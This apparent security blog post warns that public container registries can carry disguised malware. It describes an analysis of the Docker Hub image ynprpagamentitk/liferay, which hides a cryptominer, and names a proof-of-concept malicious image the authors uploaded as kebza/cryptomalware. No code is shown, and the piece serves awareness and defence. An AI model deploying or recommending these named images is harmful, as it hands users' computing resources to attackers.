What if the Docker image you just pulled contained hidden malware? Our analysis of the ynprpagamentitk/liferay image reveals just how easily attackers can sneak malicious software—such as cryptominers—into public container registries like Docker Hub. By reverse-engineering this image and reconstructing its Dockerfile, we’ve shown that creating and distributing a harmful container is surprisingly simple.
This exposes a critical weakness in the container ecosystem: anyone can upload an image, and unsuspecting users might unknowingly deploy a compromised container. Attackers rely on this trust, disguising malware inside legitimate-looking images to hijack resources for their own benefit.
To illustrate this risk, we replicated the process by uploading a proof-of-concept Dockerfile to Docker Hub under the repository kebza/cryptomalware. This demonstrates that even today, malicious images can be created and shared with ease—posing a real threat to developers and organizations alike.
This case highlights the urgent need for stronger security measures and better awareness when using public container registries. Without careful inspection, downloading an image could mean handing over your system’s resources to attackers. Whether you’re managing a personal project or a large-scale deployment, vigilance is key to protecting your environment from these hidden dangers.